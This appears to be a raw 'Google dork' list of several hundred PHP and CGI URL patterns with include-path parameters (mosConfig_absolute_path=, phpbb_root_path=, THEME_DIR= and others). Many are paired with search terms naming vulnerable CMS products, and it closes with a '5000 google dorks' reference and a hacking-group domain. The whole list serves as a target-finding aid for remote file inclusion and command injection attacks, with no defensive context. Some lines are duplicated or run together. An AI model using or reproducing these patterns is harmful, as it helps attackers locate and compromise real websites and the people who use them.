exibir.php?p=
exibir.php?lang=
index2.php?gorumdir=
index2.php?pag=
index2.php?lang=
index2.php?language=
index2.php?content=
index.php?middle=
step_one_tables.php?server_inc=
grademade/index.php?page=
phpshop/index.php?base_dir=
admin.php?cal_dir=
_functions.php?prefix=
contacts.php?cal_dir=
convert-date.php?cal_dir=
album_portal.php?phpbb_root_path=
mainfile.php?MAIN_PATH=
index_table.php?root_dir=
affich.php?base=
init.php?HTTP_POST_VARS=
lib.inc.php?pm_path=
include.php?gorumDir=
start_lobby.php?CONFIG[MWCHAT_Libs]=
index.php?configFile=
module_db.php?pivot_path=
index.php?lng=../../include/main.inc&G_PATH=
initdb.php?absolute_path=
step_one.php?server_inc=
pipe.php?HCL_path=
write.php?dir=
new-visitor.inc.php?lvc_include_dir=
header.php?systempath=
theme.php?THEME_DIR=
index.php?pageurl=
expanded.php?conf=
addevent.inc.php?agendax_path=
Packages.php?sourcedir=
_functions.php?prefix
addedit.php?root_dir=
view.php?root_dir=
vw_files.php?root_dir=
viewgantt.php?root_dir=
displayCategory.php?basepath=
default/theme.php?THEME_DIR=
upgrade_album.php?GERY_BASEDIR=
init.inc.php?CPG_M_DIR=
mod_mainmenu.php?mosConfig_absolute_path=
editor.php?root=
lib.php?root=
secure_img_render.php?p=
default.php?page=
arquivo.php?data=
word.php?id=
mod.php?mod=
index.php?plugin=
sendpage.php?page=
index.php?hl=
modules.php?op=
index.php?templateid=
article.php?sid=
.php?my="
.php?a="
.php?f="
.php?z="
.php?zo="
.php?la="
.php?perm="
.php?item_id="
.php?f_content="
.php?from="
.php?mid="
.php?lest="
.php?east="
.gov.br/index.php?arquivo=
index.php?ver=
/contenido/classes/class.inuse.php
news.php?CONFIG[script_path]=
index.php?vpagina=
index.php?arq=
index.php?pg_ID=
index.php?pg=
home.php?page=
*/newbb/print.php?forum=*topic_id=*"
*/newbb_plus/*="
*/news/archive.php?op=*year=*month=*"
.php?abrir="
.php?act="
.php?action="
.php?ad="
.php?archive="
.php?area="
.php?article="
.php?b="
*/tsep/include/colorswitch.php?tsep_config[absPath]=*"
.php?back="
.php?base="
.php?basedir="
.php?bbs="
.php?board_no="
.php?body="
.php?c="
.php?cal_dir="
.php?cat="
/include/init.inc.php?CPG_M_DIR="
/includes/mx_functions_ch.php?phpbb_root_path="
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]="
.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path="
.php?subd="
.php?subdir="
.php?category="
.php?choice="
.php?class="
.php?club_id="
.php?cod.tipo="
.php?cod="
.php?conf="
.php?configFile="
.php?cont="
.php?corpo="
.php?cvsroot="
.php?d="
.php?da="
.php?date="
.php?debug="
.php?debut="
.php?default="
.php?destino="
.php?dir="
.php?display="
.php?file_id="
.php?file="
.php?filepath="
.php?flash="
.php?folder="
.php?for="
.php?form="
.php?formatword="
.php?funcao="
.php?function="
.php?g="
.php?get="
.php?go="
.php?gorumDir="
.php?goto="
.php?h="
.php?headline="
.php?i="
.php?inc="
.php?include="
.php?includedir="
.php?inter="
.php?itemid="
.php?j="
.php?join="
.php?jojo="
.php?l="
.php?lan="
.php?lang="
.php?link="
.php?load="
.php?loc="
.php?m="
.php?main="
.php?meio.php="
.php?meio="
.php?menu="
.php?menuID="
.php?mep="
.php?month="
.php?mostra="
.php?n="
.php?name="
.php?nav="
.php?new="
.php?news="
.php?next="
.php?nextpage="
.php?o="
.php?op="
.php?open="
.php?option="
.php?origem="
.php?Page_ID="
.php?pageurl="
.php?para="
.php?part="
.php?pg="
.php?pid="
.php?place="
.php?play="
.php?plugin="
.php?pm_path="
.php?pollname="
.php?post="
.php?pr="
.php?prefix="
.php?prefixo="
.php?q="
.php?redirect="
.php?ref="
.php?refid="
.php?regionId="
.php?release_id="
indishell.in
.php?release="
.php?return="
.php?root="
.php?S="
.php?searchcode_id="
.php?sec="
.php?secao="
.php?sect="
.php?sel="
.php?server="
.php?servico="
.php?sg="
.php?shard="
.php?show="
.php?sid="
.php?site="
.php?sourcedir="
.php?start="
.php?storyid="
.php?str="
.php?subject="
.php?sufixo="
.php?systempath="
.php?t="
.php?task="
.php?teste="
.php?theme_dir="
.php?thread_id="
.php?tid="
.php?title="
.php?to="
.php?topic_id="
.php?type="
.php?u="
.php?url="
.php?urlFrom="
.php?v="
.php?var="
.php?vi="
.php?view="
.php?visual="
.php?wPage="
.php?y="
/components/com_forum/download.php?phpbb_root_path= com_forum
[Script Path]/admin/index.php?o= admin/index.php"
/admin/index.php?o= admin/index.php"
index.php?menu=deti&page= index.php?menu=deti&page"
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
/classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
index.php?RP_PATH= reviewpost
index.php?pagename= phpquiz
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
/tools/send_reminders.php?includedir= day.php?date=
SQuery/lib/gore.php?libpath= "/SQuery/"
m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
wamp_dir/setup/yesno.phtml?no_url= "setup"
components/com_forum/download.php?phpbb_root_path= "com_forum"
index.php?p= "/index.php?p=*.php"
index.php?pag= "/index.php?pag=*.php"
template.php?page= "/template.php?page=*.php"
main.php?page= "/main.php?page=*.php"
index2.php?pag= "/index2.php?pag=*.php"
home.php?pag= "/home.php?pag=*.php"
index.php?page= "/index.php?page=*.php"
default.php?page= "/default.php?page=*.php"
inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"
/modules/vwar/admin/admin.php?vwar_root= vwar
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum
encapscms_PATH/core/core.php?root= encapscms_PATH
inc/session.php?sessionerror=0&lang= inc
path/index.php?function=custom&custom= path
[MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]
/inc/irayofuncs.php?irayodirhack= "/inc/"
index.php?function=custom&custom= custom
cyberfolio/portfolio/msg/view.php?av= cyberfolio
/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT
*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
*pivot/modules/module_db.php?pivot_path=
*inc/header.php/step_one.php?server_inc=
*inst/index.php?lng=../../include/main.inc&G_PATH=
*inc/pipe.php?HCL_path=
*include/new-visitor.inc.php?lvc_include_dir=
*includes/header.php?systempath=
*support/mailling/maillist/inc/initdb.php?absolute_path=
*coppercop/theme.php?THEME_DIR=
*zentrack/index.php?configFile=
*include/write.php?dir=
include/new-visitor.inc.php?lvc_include_dir=
includes/header.php?systempath=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
becommunity/community/index.php?pageurl=
shoutbox/expanded.php?conf=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefix
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGery/public/displayCategory.php?basepath=
modules/My_eGery/public/displayCategory.php?basepath=
modules/4nAlbum/public/displayCategory.php?basepath=
modules/coppermine/themes/default/theme.php?THEME_DIR=
modules/agendax/addevent.inc.php?agendax_path=
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
modules/xgery/upgrade_album.php?GERY_BASEDIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
modules/mod_mainmenu.php?mosConfig_absolute_path=
pivot/modules/module_db.php?pivot_path=
library/editor/editor.php?root=
library/lib.php?root=
e107/e107_handlers/secure_img_render.php?p=
main.php?x=
main.php?page=
*default.php?page=
*default.php?body=
default.php?page=
*index.php?url=
*index.php?arquivo=
index.php?meio.php=
index.php?include=
index.php?open=
index.php?visualizar=
index.php?pagina=
index.php?inc=
index.php?page=
index.php?pag=
index.php?p=
index.php?content=
index.php?cont=
index.php?c=
index.php?meio=
index.php?x=
index.php?cat=
index.php?site=
index.php?configFile=
index.php?action=
index.php?do=
index2.php?x=
Index.php?id=
index2.php?content=
template.php?pagina
inc/step_one_tables.php?server_inc=
phpshop/index.php?base_dir=
admin.php?cal_dir=
path_of_cpcommerce/_functions.php?prefix=
contacts.php?cal_dir=
convert-date.php?cal_dir=
album_portal.php?phpbb_root_path=
mainfile.php?MAIN_PATH=
dotproject/modules/files/index_table.php?root_dir=
html/affich.php?base=
gery/init.php?HTTP_POST_VARS=
pm/lib.inc.php?pm_path=
ideabox/include.php?gorumDir=
modules/tasks/viewgantt.php?root_dir=
cgi-bin/index.cgi?page=
cgi-bin/awstats.pl?update=1&logfile=
cgi-bin/awstats/awstats.pl?configdir
cgi-bin/ikonboard.cgi
cgi-bin/acart/acart.pl?&page=
cgi-bin/quikstore.cgi?category=
cgi-bin/ubb/ubb.cgi?g=
cgi-bin/hinsts.pl?
cgi-bin/bp/bp-lib.pl?g=
ccbill/whereami.cgi?g=ls
cgi-bin/telnet.cgi
cgi-bin/1/cmd.cgi
encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
cgi-sys/guestbook.cgi?user=cpanel&template=
account.php?action= account.php?action=
account.php?action= iurl:"account.php?action="
account.php?action= iurl:".php?action="
account.php?action= .php?action=
accounts.php?command= .php?command="
addmedia.php?factsfile[$LANGUAGE]= phpGedView
.php?p="
announcements.php?phpraid_dir= "phpraid"
announcements.php?phpraid_dir= "phpraid signup"
announcements.php?phpraid_dir= php raid
announcements.php?phpraid_dir= phpraid
announcements.php?phpraid_dir= phpraid signup
arg.php?arg= .php?arg=
args.php?arg= .php?arg=
atom.php5?page= .php5?id=
auto.php?inc= .php?inc="
auto.php?page= auto.php?page=
base.php?f1= base.php?f1="
base.php?f1= .php?f1="
board.php?see= board.php?see="
board.php?see= .php?see="
book.php5?page= php5?page=
/calendar.php?l= calendar.php?l="
/calendar.php?l= calendar.php?l=
/calendar.php?p= calendar.php?p="
/calendar.php?p= calendar.php?p=
/calendar.php?pg= calendar.php?pg="
/calendar.php?pg= calendar.php?pg=
/calendar.php?s= calendar.php?s="
/calendar.php?s= calendar.php?s=
/addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/"
/addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/
/addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
/addpost_newpoll.php?addpoll=preview&thispath= "ubbthreads"
/addpost_newpoll.php?addpoll=preview&thispath= ubbthreads
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository"
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "Mambo"
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= "com_serverstat"
canal.php?meio= .php?meio="
/classes/adodbt/sql.php?classes_dir= "adobt"
/classes/adodbt/sql.php?classes_dir= adobt
/classes/adodbt/sql.php?classes_dir= adobt
/classified_right.php?language_dir= "classified.php"
/classified_right.php?language_dir= classified.php
/classified_right.php?language_dir= classified.php phpbazar
/classified_right.php?language_dir= "phpbazar"
/classified_right.php?language_dir= phpbazar
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN"
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN 1.2.3"
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= "com_extended_registration"
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms"
/components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms"
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms
components/com_performs/performs.php?mosConfig_absolute_path= com_performs
components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
/components/com_zoom/includes/database.php?mosConfig_absolute_path= "com_zoom"
/components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom
/components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
content.php?page= "content.php?page=*.php"
/embed/day.php?path= "Calendar"
/embed/day.php?path= Calendar
/embed/day.php?path= intitle:"Login to Calendar"
/embed/day.php?path= "Login to Calendar"
/embed/day.php?path= Login to Calendar
/embed/day.php?path= "WebCalendar"
/embed/day.php?path= WebCalendar
enc/content.php?Home_Path= "doodle"
enc/content.php?Home_Path= doodle
enc/content.php?Home_Path= "doodle cart"
enc/content.php?Home_Path= doodle cart
enc/content.php?Home_Path= "powered by doodle cart"
enc/content.php?Home_Path= powered by doodle cart
/header.php?abspath= "MobilePublisherPHP"
/header.php?abspath= MobilePublisherPHP
impex/ImpExData.php?systempath= intext:powered by vbulletin
impex/ImpExData.php?systempath= powered by vbulletin
impex/ImpExData.php?systempath= "vbulletin"
impex/ImpExData.php?systempath= vbulletin
/includes/dbal.php?eqdkp_root_path= "EQdkp"
/includes/dbal.php?eqdkp_root_path= EQdkp
/includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
/includes/dbal.php?eqdkp_root_path= powered by EQdkp
/includes/kb_constants.php?module_root_path= "Base"
/includes/kb_constants.php?module_root_path= Base
/includes/kb_constants.php?module_root_path= "Knowledge"
/includes/kb_constants.php?module_root_path= Knowledge
/includes/kb_constants.php?module_root_path= "Knowledge Base"
/includes/kb_constants.php?module_root_path= Knowledge Base
/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
/includes/kb_constants.php?module_root_path= Powered by Knowledge Base
index1.php?= "index1.php?="
index1.php?= index1.php?=
index1.php?= "index1.php?=*.php?
index2.php?= "index2.php?="
index2.php?= index2.php?=
index2.php?= "index2.php?=*.php?"
index.php?body= index.php?body=
index.php?body= "index.php?body="
index.php?go1= index.php?go1=
index.php?go1= "index.php?go1="
index.php?go= "index.php?go="
index.php?go= index.php?go=
index.php?pageurl= "index.php?pageurl="
index.php?pageurl= "index.php?pageurl=*.php"
index.php?pageurl= index.php?pageurl=*.php
index.php?pageurl= "index.php?pageurl=*.php
index.php?pagina1= "index.php?pagina1="
index.php?pagina1= index.php?pagina1=
index.php?pagina= "index.php?pagina="
index.php?pagina= "index.php?pagina=*.php"
index.php?site1= index.php?site1=
index.php?site1= "index.php?site1="
index.php?site= "index.php?site="
index.php?site= index.php?site=
index.php?var1= "index.php?var1="
index.php?var1= index.php?var1=
index.php?var2= index.php?var2=
index.php?var= index.php?va21=
index.php?var= index.php?var=
index.php?var= "index.php?var1="
index.php?var= index.php?var1=
index.php?var= "index.php?var2="
index.php?var= index.php?var2=
index.php?var= "index.php?var=*.php"
index.php?var= index.php?var=*.php
/login.php?dir= login.php?dir=
/login.php?dir= "login.php?dir="
/login.php?dir= login.php?dir=
main.php?id= "main.php?id=*.php"
/main.php?sayfa= "main.php?sayfa="
/main.php?sayfa= main.php?sayfa=
/mcf.php?content= mcf.php"
mcf.php?content= mcf.php"
mcf.php?content= "mcf.php"
mcf.php?content= mcf.php
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
/modules/TotalCalendar/about.php?inc_dir= "TotalCalendar"
/modules/TotalCalendar/about.php?inc_dir= TotalCalendar
/modules/vwar/admin/admin.php?vwar_root= "vwar"
/modules/vwar/admin/admin.php?vwar_root= vwar
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "index.php?id="
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer"
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "CMS"
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
/skin/zero_vote/error.php?dir= "skin/zero_vote/error.php"
/skin/zero_vote/error.php?dir= skin/zero_vote/error.php
/sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
/sources/functions.php?CONFIG[main_path]= "Powered By ScozNews"
/sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)
/sources/functions.php?CONFIG[main_path]= Powered By ScozNews
/sources/functions.php?CONFIG[main_path]= "ScozNews"
/sources/functions.php?CONFIG[main_path]= ScozNews
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Aardvark"
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Aardvark TopSites"
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark TopSites
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2
/sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
/sources/template.php?CONFIG[main_path]= (Powered By ScozNews)
/sources/template.php?CONFIG[main_path]= Powered By ScozNews
/sources/template.php?CONFIG[main_path]= "ScozNews"
/sources/template.php?CONFIG[main_path]= ScozNews
/surveys/survey.inc.php?path= surveys
/surveys/survey.inc.php?path= "surveys"
/tags.php?BBCodeFile= intitle:"Tagger LE"
/tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
/tags.php?BBCodeFile= "Tagger LE"
/tags.php?BBCodeFile= Tagger LE
/tags.php?BBCodeFile= "tags.php"
/tags.php?BBCodeFile= tags.php
/templates/headline_temp.php?nst_inc= intitle:fusion:news:management
/templates/headline_temp.php?nst_inc= 'fusion"
/templates/headline_temp.php?nst_inc= "fusion"
/templates/headline_temp.php?nst_inc= fusion
/templates/headline_temp.php?nst_inc= fusion:news:management:system
/templates/headline_temp.php?nst_inc= "management"
/templates/headline_temp.php?nst_inc= management
/templates/headline_temp.php?nst_inc= "news"
/templates/headline_temp.php?nst_inc= news
/templates/headline_temp.php?nst_inc= "system"
/templates/headline_temp.php?nst_inc= system
/tools/send_reminders.php?includedir= "day.php?date="
/tools/send_reminders.php?includedir= day.php?date=
/ws/get_events.php?includedir= /WebCalendar/
/ws/get_events.php?includedir= "/WebCalendar/"
/ws/get_events.php?includedir= "WebCalendar"
/zipndownload.php?PP_PATH= "PhotoPost"
/zipndownload.php?PP_PATH= PhotoPost
/zipndownload.php?PP_PATH= "PhotoPostP"
/zipndownload.php?PP_PATH= "PhotoPost PHP"
/zipndownload.php?PP_PATH= "PhotoPost PHP 4.6"
/zipndownload.php?PP_PATH= PhotoPost PHP 4.6
/zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6
cmd.php?arg= .php?arg=
/codebb/lang_select?phpbb_root_path= codebb
/codebb/lang_select?phpbb_root_path= codebb 1.1b3
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php
content.php?inc= .php?inc="
content.php?seite= content.php?seite=
content.php?seite= .php?seite=
dbase.php?action= dbase.php
dbase.php?action= dbase.php?action=
dbase.php?action= .php?action=
default.php?arquivo= .php?arquivo=
default.php?vis= .php?vis="
define.php?term= .php?term="
detail.php?prod= detail.php?prod="
detail.php?prod= .php?prod="
details.php?loc= details.php?loc=
details.php?loc= .php?loc=
directions.php?loc= directions.php?loc=
direct.php?loc= direct.php?loc=
display.php?f= display.php?f=
display.php?file= display.php?file=
display.php?lang= display.php?lang=
display.php?l= display.php?l=
display.php?ln= display.php?ln=
display.php?pag= display.php?pag=
display.php?page= display.php?page="
display.php?page= .php?page="
display.php?page=&lang= display.php?page="
display.php?page=&lang= .php?page="
display.php?p= display.php?p=
display.php?pg= display.php?pg=
display.php?s= display.php?s=
display.php?table= display.php?table=
display.php?table= .php?table=
download.php?sub= "download.php?sub="
download.php?sub= download.php?sub=
eng.php?img= eng.php?img=
eng.php?img= .php?img=
/exibir.php?arquivo= .php?arquivo=
experts.php?sub= "experts.php?sub="
experts.php?sub= experts.php?sub=
forum.php?seite= .php?seite=
frag.php?exec= frag.php"
frag.php?exec= frag.php?exec="
frag.php?exec= .php?exec="
frame.php?loc= .php?loc="
galerie.php?do= .php?do="
glossary.php?term= .php?term="
handlinger.php?vis= .php?vis="
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP Ged View
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP GedView
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView <= 3.3.7
home1.php?ln= .php?ln=
home2.php?ln= .php?ln=
home.php?a= home.php?a="
home.php?a= .php?a="
home.php?act= "home.php?act="
home.php?act= home.php?act=
home.php?arg= .php?arg=
home.php?func= .php?func="
home.php?i= "home.php?i="
home.php?i= home.php?i=
home.php?inc= "home.php?inc="
home.php?inc= home.php?inc=
home.php?ln= .php?ln=
home.php?ltr= .php?ltr="
home.php?sit= .php?sit="
home.php?table= .php?table=
image.php?img= image.php?img=
image.php?img= .php?img=
img.php?loc= img.php?loc="
img.php?loc= .php?loc="
inc.php?inc= .php?inc="
index1.php?arg= .php?arg=
index1.php?arq= .php?arq=
index1.php?func= .php?func="
index1.php?inc= .php?inc="
index1.php?lk= .php?lk="
/index1.php?ln= .php?ln=
index1.php?ltr= .php?ltr="
index1.php?mid= index1.php?mid=
index1.php?page= index1.php?page="
index1.php?p= .php?p="
index1.php?p= .php?pag="
index1.php?p= .php?page="
index1.php?p= .php?pg="
index1.php?s= index1.php?s="
index1.php?show= index1.php?show="
index1.php?show= .php?show="
index1.php?table= .php?table=
index2.php?arg= .php?arg=
index2.php?arq= .php?arq=
index2.php?c= index2.php?c="
index2.php?c= .php?c="
index2.php?cont= index2.php?cont="
index2.php?cont= .php?cont="
index2.php?content= index2.php?cont="
index2.php?content= index2.php?content="
index2.php?content= .php?content="
index2.php?content= index2.php?content=
index2.php?content= .php?content=
index2.php?i= /index2.php?i=
index2.php?inc= .php?inc="
index2.php?l= .php?l="
index2.php?lg= index.php?lg="
index2.php?lk= .php?lk="
index2.php?ln= index.php?ln="
index2.php?ln= .php?ln="
index2.php?lng= index.php?lng="
index2.php?loca= index2.php?loca=
index2.php?loca= .php?loca=
index2.php?meio= .php?meio=
index2.php?s= index2.php?s="
index2.php?s= .php?s="
index2.php?table= .php?table=
index2.php?x= index2.php?x=
index2.php?x= .php?x=
index.php3?act= index.php3?act=
index.php3?act= .php3?act=worldwideanons.blogspot.com/5000 google dorks